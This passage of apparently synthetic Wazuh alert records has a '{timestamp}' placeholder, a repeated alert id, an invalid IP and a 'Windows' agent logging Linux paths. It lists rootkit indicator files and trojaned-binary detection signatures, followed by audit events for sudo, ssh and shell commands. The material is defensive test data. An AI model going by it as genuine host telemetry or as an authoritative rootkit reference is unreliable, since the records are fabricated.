(rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Knark' detected by the presence of file '/proc/knark'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Knark' detected by the presence of file '/proc/knark'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/lsof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/lsof' detected. Signature used: '/prof|/dev/[^apcmnfk]|proc.h|bash|^/bin/sh|/dev/ttyo|/dev/ttyp' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/find","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/find' detected. Signature used: 'bash|/dev/[^tnlcs]|/prof|/home/virus|file.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/lib/defs'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/find","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/find' detected. Signature used: 'bash|/dev/[^tnlcs]|/prof|/home/virus|file.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'ZK' detected by the presence of file 'etc/1ssue.net'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'ZK' detected by the presence of file 'etc/1ssue.net'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/n3tstat'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/n3tstat'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/tcpdump","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/tcpdump' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^bu]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/egrep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/egrep' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/fuser","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/grep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/grep' detected. Signature used: 'bash|givemer' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/egrep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/egrep' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/lsof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/lsof' detected. Signature used: '/prof|/dev/[^apcmnfk]|proc.h|bash|^/bin/sh|/dev/ttyo|/dev/ttyp' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/lib/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/lib/volc'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Omega' detected by the presence of file '/dev/chr'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/top","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/top' detected. Signature used: '/dev/[^npi3st%]|proc.h|/prof/' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/w","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/w' detected. Signature used: 'uname -a|proc.h|bash' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Adore' detected by the presence of file '/dev/.shit/red.tgz'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Adore' detected by the presence of file '/dev/.shit/red.tgz'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'ZK' detected by the presence of file 'etc/1ssue.net'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'ZK' detected by the presence of file 'etc/1ssue.net'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/n3tstat'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/n3tstat'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":9,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Rh-Sharpe' detected by the presence of file '/usr/bin/.ps'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Rh-Sharpe' detected by the presence of file '/usr/bin/.ps'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Suspicious' detected by the presence of file 'lib/.so'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Suspicious' detected by the presence of file 'lib/.so'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/lib/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/lib/volc'."} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: 